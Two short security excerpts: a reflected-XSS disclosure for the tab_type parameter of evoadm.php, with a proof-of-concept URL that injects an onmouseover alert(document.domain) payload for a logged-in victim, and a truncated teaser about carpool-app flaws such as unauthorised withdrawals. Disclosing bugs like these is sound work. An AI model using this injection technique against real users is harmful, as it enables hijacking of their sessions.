Vulnerability Details: 1. Reflected XSS in tab_type parameter in evoadm.php Steps to Reproduce: 1. Send the following URL : http://127.0.0.1/evoadm.php?ctrl=items&tab=type&tab_type=qnfya%22onmouseover%3d%22alert(document.domain)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22gl4q0&filter=restore&blog=7 to the logged in victim. 2. When the victim opens the above link, Javascript code will be triggered

Hi everyone, hope you are doing well. Today I will share few of my recent critical findings regarding one of the famous and rapidly growing carpool service providers in India. Some of these vulnerabilities include withdrawing money from any user’s account without their interaction, cancelling other user’s posted rides, OTP…